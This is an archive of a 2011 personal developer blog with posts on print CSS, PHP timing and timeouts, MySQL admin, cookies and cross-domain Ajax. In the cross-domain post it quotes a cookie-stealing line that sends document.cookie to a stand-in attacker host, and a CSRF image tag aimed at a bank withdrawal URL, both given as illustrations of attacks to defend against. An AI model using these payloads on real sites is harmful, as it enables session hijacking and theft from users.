Sunday, December 11, 2011

checks before printing a web page

Recently we launched an online forms product where students can apply for courses at various institutes individually, pay form fees, submit documents, etc. Here we ran into issues with the print-web-page functionality. It behaves differently across browsers, and sometimes the printed form layout is not the same as the form shown on the web page. The team is working on it; meanwhile I searched Google to find the root causes.


1. Avoid printing the web page; the best option is to provide a PDF instead, as we did earlier for the sums invoice reports (a minimal sketch of serving a PDF follows these two points).


2. If we do plan to print the web page, let's look at the points below, which we generally follow.
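For point 1, here is a minimal sketch of streaming a pre-generated PDF from PHP instead of relying on the browser's print rendering. The file path and name are just placeholders.

<?php
// Minimal sketch: stream an already-generated PDF to the browser.
// The path below is hypothetical; generate or locate the real file first.
$file = '/var/data/forms/application-form.pdf';

header('Content-Type: application/pdf');
header('Content-Disposition: attachment; filename="application-form.pdf"');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
?>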


General print-style tips for getting better printouts



/* Print styles */
@media print 
{
    tr, td, th {page-break-inside:avoid}
    thead {display:table-header-group}
    .NoPrint {visibility:hidden; display:none}
    a {color:#000000}
}



  1. The top one prevents page breaks inside of a table row
  2. The thead style makes any rows in the thead tag repeat for each page that the table spans across.
  3. NoPrint is a class I use to show something on the screen, but not in print.
  4. And, I like to turn off link colors.

Use a separate stylesheet for print.

<LINK rel="stylesheet" type="text/css" href="print.css" media="print">

There is another way as well:

<STYLE type="text/css">
@media print {
   BODY {font-size: 10pt; line-height: 120%; background: white;}
}
@media screen {
   BODY {font-size: medium; line-height: 1em; background: silver;}
}
</STYLE>


So let's take an example CSS file where we show two different versions, one for screen and one for print.


/* screen display styles */
BODY {color: silver; background: black;}
A:link {color: yellow; background: #333333; text-decoration: none;}
A:visited {color: white; background: #333333; text-decoration: none;}
A:active {color: black; background: white; text-decoration: none;}
H1, H2, H3 {color: #CCCCCC; background: black; padding-bottom: 1px;
    border-bottom: 1px solid gray;}


And for the print version:

/* print styles */
BODY {color: black; background: white;}
A:link, A:visited {background: white; color: black; text-decoration: underline;
   font-weight: bold;}
H1, H2, H3 {background: white; color: black; padding-bottom: 1px;
   border-bottom: 1px solid gray;}
DIV.adbanner {display: none;}

There are some other things, like margins, floats, and hyperlinks, that affect printing. So here is a common print CSS.

body {
   background: white;
   font-size: 12pt;
   }
#menu {
   display: none;
   }
#wrapper, #content {
   width: auto;
   margin: 0 5%;
   padding: 0;
   border: 0;
   float: none !important;
   color: black;
   background: transparent none;
   }
div#content {
   margin-left: 10%;
   padding-top: 1em;
   border-top: 1px solid #930;
   }
div#mast {
   margin-bottom: -8px;
   }
div#mast img {
   vertical-align: bottom;
   }
a:link, a:visited {
   color: #520;
   background: transparent;
   font-weight: bold;
   text-decoration: underline;
   }
#content a:link:after, #content a:visited:after {
   content: " (" attr(href) ") ";
   font-size: 90%;
   }
#content a[href^="/"]:after {
   content: " (http://www.shiksha.com" attr(href) ") ";
   }
Hope it will be helpful.








Sunday, November 13, 2011

Is microtime enough to measure time consumed in a software application?


I heard that a few engineers were debating how to find the actual time consumed in the profile page, and especially the accuracy of PHP's microtime: a sort of benchmarking that tells how much CPU was used by new pieces of code.

We live in a time of multitasking, multiple processors, and background processing, so debating microtime vs. CPU usage in isolation is not very useful for a web application. Still, measurement and benchmarking are required to build a robust and reliable application.

Let's get back to the system time vs. wall time debate.

Having a browser open for one hour doesn't mean the computer has spent an hour dedicating its resources to the browser (unless it's IE, of course… :P).

It also depends on the application. APC, memcached, Varnish, Gearman, Cassandra, etc. can skew both the benchmark results and the estimates.

There are three different kinds of time taken by an application:

1. System time (time the processor spends on behalf of the current process, in the kernel)
2. User time (time spent executing code in user mode)
3. Wall time (the amount of time that passes on our wall clock while the process runs)

The advantage of system time is that it includes the time taken by anything done on the process's behalf, right down to low-level system operations (i.e. file I/O, socket operations). This can also be a disadvantage, though, because it may make it harder to determine whether a bottleneck is in your code or in some subsystem your code uses.

getrusage() reports CPU time used, while microtime() reports wall-clock time. The program may run for 10 minutes according to the clock on the wall, but internally may only use a few seconds of CPU time. Then there's contention for CPU time with all the background programs running on the system, resource contention, plus regular housekeeping.
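To see the difference in practice, here is a minimal sketch that measures the same block of code with both microtime() (wall-clock time) and getrusage() (user + system CPU time). The sleep(2) call is just a stand-in for the real work being profiled.

<?php
// Sum user + system CPU time from a getrusage() snapshot.
function cpu_seconds(array $ru)
{
    return $ru['ru_utime.tv_sec'] + $ru['ru_utime.tv_usec'] / 1e6   // user time
         + $ru['ru_stime.tv_sec'] + $ru['ru_stime.tv_usec'] / 1e6;  // system time
}

$wallStart = microtime(true);
$cpuStart  = cpu_seconds(getrusage());

sleep(2); // stand-in for the code being profiled: burns wall time, almost no CPU

$wall = microtime(true) - $wallStart;
$cpu  = cpu_seconds(getrusage()) - $cpuStart;

printf("wall: %.3fs, cpu: %.3fs\n", $wall, $cpu);
?>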

There are far too many factors involved to get accurate timings for such short periods. Doing three runs of the while(microtime()) version of the loop, I got the following timings:
user: 0.98, 0.09, 0.90 sys: 0.12, 0.05, 0.94

Obviously quite a lot of variance. Even a simple run has utime/stime values ranging from 0 to 0.03.

Try running the application for longer periods, and do something within those runs to increase CPU usage.

An API in PHP to check server load
// make sure safe mode is off, since exec() is used

function ServerLoad()
{
    $stats = exec('uptime');
    preg_match('/averages?: ([0-9.]+),\s+([0-9.]+),\s+([0-9.]+)/', $stats, $regs);
    return ($regs[1].', '.$regs[2].', '.$regs[3]);
}
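
If shelling out to uptime is not desirable, PHP's built-in sys_getloadavg() (available since 5.1.3, not on Windows) returns the same three load averages directly:

// 1, 5 and 15 minute load averages as floats
list($load1, $load5, $load15) = sys_getloadavg();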

Happy Coding !!! Enjoy !

I want to exit from a user-defined PHP function if it takes longer than expected


I think this is a common problem in our applications. There are many activities that take a long time; this makes for a bad user experience and sometimes throws unexpected errors, like a blank page.

In PHP there is no clean way to handle this unless your code is written in a multi-processing manner.

Let's look at the function's outline.

function downloadCSV($activityId)
{
    // 1. check the logged-in user (user has proper credits; authenticate the user again)
    // 2. RPC to get the activity detail (activity is marked as pending/done/in progress etc.)
    // 3. RPC to get the user ids resulting from the activity id
    // 4. RPC to get the user details
    // 5. build the CSV
    // 6. deduct credits from the user account and update log tables in the DB
    // 7. download the CSV
}

This API can fail at various steps:

1. network timeout/failure
2. the DB is down
3. the server is down
4. an RPC fails for the above reasons
5. a timeout while fetching user details
6. the DB server is hogged up

Below I have listed what I figured out from the Internet. There are other solutions too, but I kept in mind to touch the existing code as little as possible.

1. Check HTTP code using curl

$httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
/* Handle 404 here. */
}

2. Using curl to set timeouts (a combined example follows this list)

curl_setopt($curl, CURLOPT_TIMEOUT, 2);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 2);

3. Setting the socket timeout

ini_set('default_socket_timeout', 10);
$url = "http://example.com/";
if( file_get_contents( $url ) === false ) {
   // failure
} else {
   // success
}

4. Using PHP's stream_set_timeout() on an already opened stream
stream_set_timeout($fp, 2); // $fp is a stream opened with fopen()/fsockopen()
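
Putting approaches 1 and 2 together, here is a minimal self-contained sketch of calling a slow RPC endpoint with strict timeouts plus HTTP-status checking; the RPC URL is hypothetical.

<?php
// Strict timeouts plus HTTP status checking for one RPC call.
$curl = curl_init('http://rpc.internal.example/activity/detail?id=42'); // hypothetical URL
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 2);  // give up if no connection within 2s
curl_setopt($curl, CURLOPT_TIMEOUT, 5);         // give up if the whole call exceeds 5s

$body     = curl_exec($curl);
$httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);

if ($body === false) {
    // network failure or timeout; curl_error() says which
    error_log('RPC failed: ' . curl_error($curl));
} elseif ($httpCode != 200) {
    error_log('RPC returned HTTP ' . $httpCode);
} else {
    // use $body
}
curl_close($curl);
?>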

Another approach is forking your code so that the work runs in a separate process, and then setting a timer that exits after some configurable limit; a sketch of this follows.
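
As a sketch of that idea (it needs the CLI SAPI with the pcntl and posix extensions, so it will not work under mod_php), the slow part can be pushed into a child process that the parent kills once a time budget is spent. downloadCSVWorker() is a hypothetical wrapper around the slow RPC/CSV steps above.

<?php
$timeout = 30;            // seconds we are willing to wait
$pid = pcntl_fork();

if ($pid === 0) {
    // child process: do the slow work, then exit
    downloadCSVWorker();  // hypothetical wrapper around steps 2-7
    exit(0);
}

// parent: poll the child until it finishes or the budget runs out
for ($elapsed = 0; $elapsed < $timeout; $elapsed++) {
    if (pcntl_waitpid($pid, $status, WNOHANG) === $pid) {
        exit(pcntl_wexitstatus($status));   // child finished in time
    }
    sleep(1);
}

// budget exceeded: kill the child, reap it, and report a timeout
posix_kill($pid, SIGKILL);
pcntl_waitpid($pid, $status);
echo "downloadCSV timed out after {$timeout}s\n";
?>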


design components of distributed application architecture


It requires time to discuss in detail, and this post is still in a draft state, but I have figured out a few important options for the architecture. Please go through them and feel free to suggest anything better.


  1. Create a web service with something like Apache Axis
  2. Use an ESB - something like Mule or JBoss
  3. Use a simple web Servlet on the server, and submit data using HTTP POST. You could use a simple embeddable Java web server like Jetty to do this.
  4. Use a messaging protocol like Kryonet or Google's protocol buffers
  5. Use a more general network application framework such as Netty

Sunday, November 6, 2011

funny programming terms that we share in the workplace


I have maintained a list. Please feel free to add to it.

Chindi

It means cheap, quick-and-dirty code that nonetheless works well.

Cha-gai

Impressive code that was written in a very short time.

Chamka

When things become properly clear.

Quantum bug

The bug that fails to occur when trying to observe it (ie tracing through code a line at a time).

Code Monkey

An insulting term to describe a poor programmer, usually who does not grasp basic or common programming concepts, and sometimes whose best coding capabilities can be described as "GoogleCut&Paste".

Ghost Bug.

Referring to a bug that cannot be reproduced under controllable conditions; a bug that seems to have appeared but no one is sure about it. A bug that requires voodoo to fix. A bug
that drives a developer to think that a mutex should be used in a single-threaded app.

Hackfactoring

The process of taking code and refactoring it without consequence to make it do what management demands that the code do.

Faith based programming

When "Jimmy", instead of using a more… "scientific" approach to problem solving, just randomly deletes, comments out, or renames a variable or line of code and prays for it to compile and run.

Pixie Dust

A "tool" used by developers to "magically" fix certain issues via abnormal/illogical/unexplained means. (coined by the leader of our support team) When an issue completely baffles the
development team we are "out of pixie dust".

A**hole Features

Features that are thought of during release planning that add little to no actual value to the software.

Fragile

Using Agile methodologies while people totally screw them up.

Hi-driven development

When you debug your program by writing alert('Hi') statements in a trial-and-error fashion

Disaster Driven Development

When your PMs and salesmen have promised that you will build a "space shuttle" in one month.

Hope Driven Development

A software development technique in which an application is developed in a long unplanned development cycle, with minimal "Steve Irwin-style testing", all with the hope that
everything will work as intended when released.

Different kinds of bug reports:

Smug Report - a bug submitted by a user who thinks he knows a lot more about the system's design than he really does. Filled with irrelevant technical details and one or more suggestions (always
wrong) about what he thinks is causing the problem and how we should fix it.

Drug Report - a report so utterly incomprehensible that whoever submitted it must have been smoking crack. The lesser version is a chug report, where the submitter is thought to have had one too many.

Shrug Report - a bug report with no error message or repro steps and only a vague description of the problem. Usually contains the phrase "doesn't work."

Refuctoring

The process of taking a well-designed piece of code and, through a series of small, reversible changes, making it completely unmaintainable by anyone except yourself.

Heisenbug

Can't take credit for this, but it is awesome!
A computer bug that disappears or alters its characteristics when an attempt is made to study it.

Hindenbug

A catastrophic data destroying bug - "Oh the humanity!"

Counterbug

A bug you present when presented with a bug caused by the person presenting the bug

Bloombug

A bug that accidentally generates money (just did this one)

Fear Driven Development

When project management adds more pressure (fires someone or something).

Common Law Feature

A bug in the application that has existed so long that it is now part of the expected functionality, and user support is required to actually fix it.


Hydra Code

Code that cannot be fixed. One fix causes two new bugs. It should be rewritten.

Protoduction

A prototype that ends up in production.

Ninja comments

Also known as invisible comments, secret comments, or no comments.

Chunky salsa

Based on the chunky salsa rule, a single critical error or bug that renders an entire system unusable, especially in a production environment.

Rubberducking

Sometimes, you just have to talk a problem out. I used to go to my boss and talk about something and he'd listen and then I'd just answer my own question and walk out without him saying a thing.

I read about someone that put a rubber duck on their monitor so they could talk to it, so rubberducking is talking your way through a problem.

Databasically

"Hey, I'll put all of our customers into a Word document and then we can X." "No, we should do that database-ically so that we can keep that list up to date."

Hooker Code


Code that is problematic and causes application instability (application "goes down" often).

Friday, September 23, 2011

how to kill multiple locked queries in mysql

There are actually two ways: one works if your MySQL information_schema database has a processlist table,
and the second is a simple shell script.

If information_schema.processlist exists:

mysql> select concat('KILL ',id,';') from information_schema.processlist where user='root' into outfile '/tmp/a.txt';
Query OK, 2 rows affected (0.00 sec)

mysql> source /tmp/a.txt;
Query OK, 0 rows affected (0.00 sec)

If information_schema.processlist doesn’t exist on your version of MySQL, this will work.

#!/bin/bash
for each in `mysqladmin -u user -ppassword processlist | awk '{print $2, $4, $8}' | grep mailer | grep shiksha | awk '{print $1}'`;
do mysqladmin -u root -ppassword kill $each;
done
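
The same thing can also be done from PHP with mysqli. A minimal sketch, assuming information_schema.processlist exists; the credentials and the user name to match are placeholders.

<?php
// Kill every MySQL process belonging to a given user.
$db   = new mysqli('localhost', 'root', 'password'); // placeholder credentials
$user = 'mailer';                                     // placeholder user to match

$res = $db->query("SELECT id FROM information_schema.processlist WHERE user = '"
                  . $db->real_escape_string($user) . "'");
while ($row = $res->fetch_assoc()) {
    // KILL takes a literal thread id, so cast to int instead of binding
    $db->query('KILL ' . (int) $row['id']);
}
$db->close();
?>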

Wednesday, September 21, 2011

web based business development and node js

I was really amazed when I installed Node.js and ran a few test scripts. It's tremendously powerful and gives you wings to do anything: we can build a chat server in a few minutes, and we can build web servers, TCP/IP services, message queues, DB connections, etc.


Main advantages are:



  1. Web development in a dynamic language (JavaScript) on a VM that is incredibly fast (V8). It is much faster than Ruby, Python,PHP or Perl.
  2. Ability to handle thousands of concurrent connections with minimal overhead on a single process.
  3. JavaScript is perfect for event loops with first class function objects and closures. People already know how to use it this way having used it in the browser to respond to user initiated events.
  4. A lot of people already know JavaScript, even people who do not claim to be programmers. It is arguably the most popular programming language.
  5. Using JavaScript on a web server as well as the browser reduces the impedance mismatch between the two programming environments which can communicate data structures via JSON that work the same on both sides of the equation. Duplicate form validation code can be shared between server and client, etc.
While I elaborate on these things, I will share a few more details with screenshots, which might be interesting for understanding the magic of Node.js.

Thursday, September 15, 2011

demo code to test third party cookie

Hi Folks,

Here I am sharing the code snippets that I used to test and understand cookies, especially third-party cookies.

What did I do?
I created two local domains, www.local-dom1.com and www.local-dom2.com,
and then tried to set a cookie across domains.

How did I do it?
I wrote PHP code which sets the cookie and then outputs a tiny GIF image, and then used an IMG tag on the second domain with its src pointing at that PHP script.

PHP code:


<?php

/* The next four values may be changed. */
$CookieName = "mycookie";    // Cookie's name
$CookieValue = "hello Ravi"; // Cookie's value
$CookieDirectory = "/";        // Cookie directory ("/" for all directories)
$DaysCookieShallLast = 31;     // Days before expiration (decimal number okay.)
/*********************************************************************/
$CookieDomain = 'www.local-dom1.com';
$lasting = ($DaysCookieShallLast<=0) ? "" : time()+($DaysCookieShallLast*24*60*60);
setcookie($CookieName,$CookieValue,$lasting,$CookieDirectory,$CookieDomain);
$image = "R0lGODlhBQAFAJH/AP///wAAAMDAwAAAACH5BAEAAAIALAAAAAAFAAUAAAIElI+pWAA7n";
header('Content-type: image/gif');
echo base64_decode($image);
exit;
?>

HTML code at www.local-dom2.com:


<img
   src="http://www.local-dom1.com/public/setcookie.php"
   width="1"
   height="1"
   border="0"
   alt="cookie">
<script>

function getCookie(c_name)
{
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++)
{
  x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
  y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
  x=x.replace(/^\s+|\s+$/g,"");
  if (x==c_name)
    {
    return unescape(y);
    }
  }
}
alert(getCookie('mycookie'));
</script>
<?php echo $_COOKIE["mycookie"]; ?>

Hope this code is helpful for understanding what I said in my previous post.

Happy coding !!!

Monday, September 12, 2011

cross domain cookies, third party cookies and cross site ajax: facts and myths

There are a few questions in my mind which need appropriate and correct answers…
  1. Is it possible to set a cookie for another domain with JavaScript?
  2. Ajax cross-domain calls, or making cross-sub-domain Ajax (XHR) requests
  3. How OpenSocial works
Below I discuss each one by one, but please feel free to post your comments if you see anything that needs correction or if you have queries.


We already know the basics of cookies (http://ravirajsblog.blogspot.com/2010/11/abc-of-http-cookie-detailed-look.html) and some typical PHP session issues (http://ravirajsblog.blogspot.com/2010/06/php-session-issue.html).


Actually there are security concerns in cross-domain communication; even server-side languages need certain settings when communicating across servers
(http://php.net/manual/en/filesystem.configuration.php).
The main concerns are cookie stealing, XSS (http://ha.ckers.org/xss.html), and cross-site request forgery (CSRF). CSRF is generally avoided these days by filtering user input; otherwise things like this can happen:


<img src="http://bank.example/withdraw?account=raviraj&amount=1000000000&for=bob"> 


Anyway, let's come back to cookie stealing.
Cookies are sent in plain text over the Internet, making them vulnerable to packet sniffing whereby someone intercepts traffic between a computer and the Internet. Once the value of a user’s login cookie is taken, it can be used to simulate the same session elsewhere by manually setting the cookie. The server can’t tell the difference between the original cookie that was set and the duplicated one that was stolen through packet sniffing, so it acts as if the user had logged in. This type of attack is called session hijacking.


A script loaded from another domain will get that page's cookies by reading document.cookie.


As an example of how dangerous this is, suppose I load a script from evil-domain.com that contains some actually useful code. However, the folks at evil-domain.com then switch that code to the following:


(new Image()).src = "http://www.evil-domain.com/cookiestealer.php?cookie=" + encodeURIComponent(document.cookie);


Now this code is loaded on my page and silently sends my cookies back to evil-domain.com. This happens to everyone who visits my site. Once they have my cookies, it’s much easier to perpetrate other attacks including session hijacking.


There are a few ways to prevent session hijacking using cookies.


The first, and most common technique among the security-conscious, is to only send cookies over SSL. Since SSL encrypts the request on the browser before transmitting across the Internet, packet sniffing alone can’t be used to identify the cookie value. Banks and stores use this technique frequently since user sessions are typically short in duration.
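
In PHP, sending cookies only over SSL is just the secure flag on setcookie() (and the httponly flag keeps scripts from reading the cookie at all). A minimal sketch with placeholder values:

<?php
// name, value, expire, path, domain, secure, httponly
// secure   = true -> the browser sends this cookie only over HTTPS
// httponly = true -> the cookie is not readable from document.cookie
setcookie('sessionid', $sessionId, 0, '/', 'www.example.com', true, true);

// the same flags for PHP's own session cookie:
ini_set('session.cookie_secure', '1');
ini_set('session.cookie_httponly', '1');
session_start();
?>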


Another technique is to generate a session key in some random fashion and/or a way that is based on information about the user (username, IP address, time of login, etc.). This makes it more difficult to reuse a session key, though doesn’t make it impossible.


Yet another technique is to re-validate the user before performing an activity deemed to be of a higher security level, such as transferring money or completing a purchase. For example, many sites require you to log in a second time before changing a password etc.


So finally all browsers decide to follow "same origin policy" concept.


Same origin policy is an important security concept for a number of browser-side programming languages, such as JavaScript. The policy permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites. This mechanism bears a particular significance for modern web applications that extensively depend on HTTP cookies to maintain authenticated user sessions, as servers act based on the HTTP cookie information to reveal sensitive information or take state-changing actions. A strict separation between content provided by unrelated sites must be maintained on the client side to prevent the loss of data confidentiality or integrity.
But the behavior of same-origin checks and related mechanisms is not well-defined in a number of corner cases, such as for protocols that do not have a clearly defined host name or port associated with their URLs.


Well, the confusion comes when you start talking about first party and third party cookies and how they are treated differently by web browsers.


A first party cookie is a cookie that is given to the website visitor by the same domain (www.domain.com) that the web page resides on. Whereas, a third party cookie is one that is issued to the website visitor by a web server that is not on the same domain as the website.


Web pages allow inclusion of resources from anyplace on the web. For example, many sites use the YUI CSS foundation for their layout and therefore include these files from the Yahoo! CDN at yui.yahooapis.com via a <link> tag. Due to cookie restrictions, the request to retrieve this CSS resource will not include the cookies for ravirajsblog.blogspot.com. However, yui.yahooapis.com could potentially return its own cookies with the response (it doesn't, it's a cookie-less server). The page at ravirajsblog.blogspot.com cannot access cookies that were sent by yui.yahooapis.com because the domain is different, and vice versa, but all the cookies still exist. In this case, yui.yahooapis.com would be setting a third-party cookie, which is a cookie tied to a domain separate from the containing page.


There are several ways to include resources from other domains in HTML:

  1. Using a <link> tag to include a style sheet.
  2. Using a <script> tag to include a JavaScript file.
  3. Using an <object> or <embed> tag to include media files.
  4. Using an <iframe> tag to include another HTML file.

In each case, an external file is referenced and can therefore return its own cookies. The interesting part is that with the request, these third-party servers receive an HTTP Referer heading (spelling is incorrect in the spec) indicating the page that is requesting the resource. The server could potentially use that information to issue a specific cookie identifying the referring page. If that same resource is then loaded from another page, the cookie would then be sent along with the request and the server can determine that someone who visited Site A also visited Site B. This is a common practice in online advertising. Such cookies are often called tracking cookies since their job is to track user movement from site to site. This isn’t actually a security threat but is an important concept to understand in the larger security discussion.
Generally, third-party cookies are issued by a banner advertiser who places a number of banners on your site and wants to know how many times they have been requested, or by a third-party hosted analytics vendor that issues a page tag for each of your pages and thereby forces a cookie onto your site.
In the last situation, where an analytics vendor issues a cookie through a page tag, the cookie is seen as a third-party cookie because it is being generated by the analytics server from which the page tag requests the invisible 1×1 tracking GIF. It is, however, possible to have an analytics cookie issued by the third-party vendor but still look like a first-party cookie.
There are two ways of achieving this:
  1. Create a DNS alias for the third-party analytics server so that it looks like it is actually part of your domain, and anything issued by this server (including cookies) becomes first party.
  2. Have the JavaScript page tag create a cookie at run time and then pass the cookie value back to the analytics server, so the cookie is created within the page and thus becomes a first-party cookie.
The obvious advantage of the DNS alias option is a smaller page tag that is quicker to load; however, the cookie-making page tag has an advantage over the DNS alias because no structural changes need to be made to the site's infrastructure and the implementation of the tag is more straightforward. Check out how GA handles cross-domain tracking, especially for e-commerce:
http://cutroni.com/blog/2006/06/25/how-google-analytics-tracks-third-party-domains/


Back to our questions. The answer to the first one is:
Nope, that will not work, for security reasons. You cannot do that with cookies alone. They are set explicitly per domain, and there isn't a legitimate (read: "non-exploit") way to set them for another domain. However, if you control both servers, it may be possible to use some workarounds/hacks to achieve this, but pretty it isn't, and it may break unexpectedly.


Let's see how OAuth-style sign-in works; using the same technique we can achieve our goal. [See the anonymous commenter's comments for how nicely he/she described this flow.]


The approach designates one domain as the 'central' domain and any others as 'satellite' domains.
When someone clicks a 'sign in' link (or presents a persistent login cookie), the sign in form ultimately sends its data to a URL that is on the central domain, along with a hidden form element saying which domain it came from (just for convenience, so the user is redirected back afterwards).
This page at the central domain then proceeds to set a session cookie (if the login went well) and redirect back to whatever domain the user logged in from, with a specially generated token in the URL which is unique for that session.
The page at the satellite URL then checks that token to see if it does correspond to a token that was generated for a session, and if so, it redirects to itself without the token, and sets a local cookie. Now that satellite domain has a session cookie as well. This redirect clears the token from the URL, so that it is unlikely that the user or any crawler will record the URL containing that token (although if they did, it shouldn't matter, the token can be a single-use token).
Now, the user has a session cookie at both the central domain and the satellite domain. But what if they visit another satellite? Well, normally, they would appear to the satellite as unauthenticated.
However, throughout the application, whenever a user is in a valid session, all links to pages on the other satellite domains have a ?s or &s appended to them. I reserve this 's' query string to mean "check with the central server because we reckon this user has a session". That is, no token or session id is shown on any HTML page, only the letter 's', which cannot identify someone.
A URL receiving such an 's' query tag will, if there is no valid session yet, do a redirect to the central domain saying "can you tell me who this is?" by putting something in the query string.
When the user arrives at the central server, if they are authenticated there the central server will simply receive their session cookie. It will then send the user back to the satellite with another single use token, which the satellite will treat just as a satellite would after logging in (see above). Ie, the satellite will now set up a session cookie on that domain, and redirect to itself to remove the token from the query string.
This solution works without script or iframe support. It does require '?s' to be added to any cross-domain URLs where the user may not yet have a cookie at that URL. I think this is possibly one approach to how we end up logged in to Gmail when we are already browsing Orkut as a registered user. A minimal sketch of the token handoff is below.
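
Here is a minimal sketch of that single-use token handoff, assuming one central domain and one satellite. The domain names and the helpers token_store_save()/token_store_consume() (backed by a shared store such as memcached or the DB) are hypothetical, and real code would also need to whitelist the return URL and expire tokens.

<?php
// --- on central.example.com: the "who is this?" endpoint ---
session_start();
$return = $_GET['return'];                    // satellite URL that asked; whitelist this in real code
if (!empty($_SESSION['user_id'])) {
    $token = bin2hex(openssl_random_pseudo_bytes(16));  // single-use token
    token_store_save($token, $_SESSION['user_id']);     // hypothetical shared store
    header('Location: ' . $return . '?sso_token=' . urlencode($token));
} else {
    header('Location: ' . $return);           // no central session either
}
exit;
?>

<?php
// --- on satellite.example.com: front controller, before any output ---
session_start();
if (isset($_GET['sso_token'])) {
    // validate and invalidate the token in one step (hypothetical helper)
    $userId = token_store_consume($_GET['sso_token']);
    if ($userId) {
        $_SESSION['user_id'] = $userId;       // the satellite now has its own session cookie
    }
    // redirect to self without the token so it never lingers in the URL
    header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?'));
    exit;
}
?>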


So we are disappointed by the first answer!! Don't worry, let's look at the second one… I am trying my best to say yes, however ;-)


The answer to the second one is also NO… This restriction comes from the same-origin policy, and even sub-domain Ajax calls are not allowed.


By enabling Apache's mod_proxy module, we can configure Apache in reverse proxy mode. In reverse proxy mode, Apache appears to the browser like an ordinary web server; however, depending upon the proxy rules defined, Apache can make the cross-domain request itself and serve the data back to the browser.


Another method of achieving sub-domain Ajax requests is by using iframes. However, JavaScript does not allow communication between two frames if they don't have the same document.domain. The simplest of the hacks to make this communication possible is to set the document.domain of the iframe to the same value as that of the parent frame.


The second method deals with cases where you want to fetch data from a sub-domain. You can't make an Ajax call directly from the parent page, hence you do it through iframes. Consider the case of Facebook chat: if you look in Firebug, all chat-related Ajax is sent to channel.facebook.com, which is achieved with the iframe approach.


A few hacky open-source options are also available, like JSONP: http://remysharp.com/2007/10/08/what-is-jsonp/


Now let's come to the last question: how does OpenSocial work?
This is a big topic which needs its own detailed write-up. There are many components we need to understand before looking at OpenSocial, like Shindig, the gadget server, RPC, REST, the container server, the container application, etc.
Here is a good link to know more about OpenSocial.
That's it for now. Cheers!!!

Tuesday, June 28, 2011

Things that i want from my Team

We have seen so many articles on the ideal team, how to be a good leader, etc. To be a good team player there are a few areas we need to look at and judge: long-term goals, effective teamwork, a decision-making approach that is used consistently, and so on; there are many things we could discuss. Given my role, leading a software development team, I am looking for the following from my team.


  1. Hire smart, fast, flexible engineers who are willing to do any type of work, and are excited to learn new technologies. We do not need "architects". If you design something, you code it, and if you code it, you test it. Engineers who do not like to go outside their comfort zone, or who feel certain work is "beneath" them, will simply get in the way.
  2. It is better to deliver 20 projects with 10 bugs and miss 5 projects by two days than to deliver 10 projects that are all perfect and on time. 
  3. Everyone who works, will make a number of mistakes the first few months, and will continue to occasionally do so over time. The important thing is how much you have learned and to not make the same mistakes over and over again.
  4. Keep designs simple and focused on the near term business needs - do not design too far ahead.
  5. When one person owns everything (CSS, JS, PHP, SQL, scripting), there is no waiting, bottlenecks, scheduling conflicts, management overhead, or distribution of "ownership". More projects/people can be added in a modular way without affecting everyone else.  
  6. The programmer is supposed to deliver the product with reasonable quality, "reasonable quality" being a term that should be defined when taking the job. In the end, you should work to get the software into good enough shape to be delivered.
  7. No software is bug-free. The developer himself is never the best tester; that is why QA steps are always necessary. The testers who blame you should be happy to have found the defects before an end customer did. Of course there is still poor programming or poor design, but also poor testing… The world is not perfect, but we have to cope with all these things in an appropriate way, using even tighter software development processes if the software you develop is used in a medical or military environment, for example. If all the tools for software quality were used (design, static code checking, peer code reviews, unit testing, component testing, system tests, etc.), nobody should be blamed.

TODO: Still in a draft state. Please add your valuable comments so that I can complete it :-)

Sunday, May 1, 2011

Lazy load techniques… another hack

We have already seen a few lazy load techniques here and here. If we have a large amount of HTML and JavaScript, it takes a long time to load the page.


Here is a trick that allows you to bundle all of your modules into a single resource without having to parse any of the JavaScript. Of course, with this strategy, there is greater latency with the initial download of the single resource (since it has all your JavaScript modules), but once the resource is stored in the browser's application cache, this issue becomes much less of a factor.

To combine all modules into a single resource, we write each module into a separate script tag and hide the code inside a comment block (/* */). When the resource first loads, none of the code is parsed since it is commented out. To load a module, find the DOM element for the corresponding script tag, strip out the comment block, and eval() the code. If the web app supports XHTML, this trick is even more elegant, as the modules can be hidden inside a CDATA tag instead of a script tag. An added bonus is the ability to lazy load your modules synchronously, since there's no longer a need to fetch the modules asynchronously over the network.

200k of JavaScript held within a block comment adds 240ms during page load, whereas 200k of JavaScript that is parsed during page load added 2600 ms. That's more than a 10x reduction in startup latency by eliminating 200k of unneeded JavaScript during page load! Take a look at the code sample below to see how this is done.



<html>
...
<script id="lazy">
// Make sure you strip out (or replace) comment blocks in your JavaScript first.
/*
JavaScript of lazy module
*/
</script>

<script>
  // Minimal helper: remove the /* and */ that wrap the lazy module's code.
  function stripOutCommentBlock(commentedCode) {
    return commentedCode.replace('/*', '').replace('*/', '');
  }

  function lazyLoad() {
    var lazyElement = document.getElementById('lazy');
    var lazyElementBody = lazyElement.innerHTML;
    var jsCode = stripOutCommentBlock(lazyElementBody);
    eval(jsCode);
  }
</script>

<div onclick="lazyLoad()"> Lazy Load </div>
</html>

File based caching on high traffic website

If you have a lot of traffic, and you’re caching a page for an hour… Over the course of one hour, you may read the file possibly 200 times, and write just once… The time taken to write is minimal, around 10ms? - So, out of one hour, you have 10ms ‘downtime’ for your cache reads.

Which is about 0.00027% downtime… extremely minimal, and not really worth worrying about.
Locks will only cause this fractional locking time, and it only affects two people trying to write at the same time.

The correct way to work around it is explained here:-

* 1 page is cached for an hour.
* When that cache expires, 2 people visit the site within 10ms of each other (the only time this will cause an 'issue', because otherwise the first will have written the cache before the second requests the page).
* The first user 'reads' the cache file, sees it's expired, so begins rendering the page normally with PHP/MySQL.
* The second user has the same thing going on… the cache hasn't yet been rewritten by the first user.
* The first user finishes building the page, and begins writing the file, locking it.
* The second user also finishes building the page, and attempts to write it.
* Because the first user has locked the file, the second user can't write it…
* This is a problem for the second user, so you simply build a little fix to make it all work like magic.

If the second user can't write the cache (because it is locked), simply echo the contents of the rendered page without saving it to the cache.
The first user is dealing with the cache, so just render the output.
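
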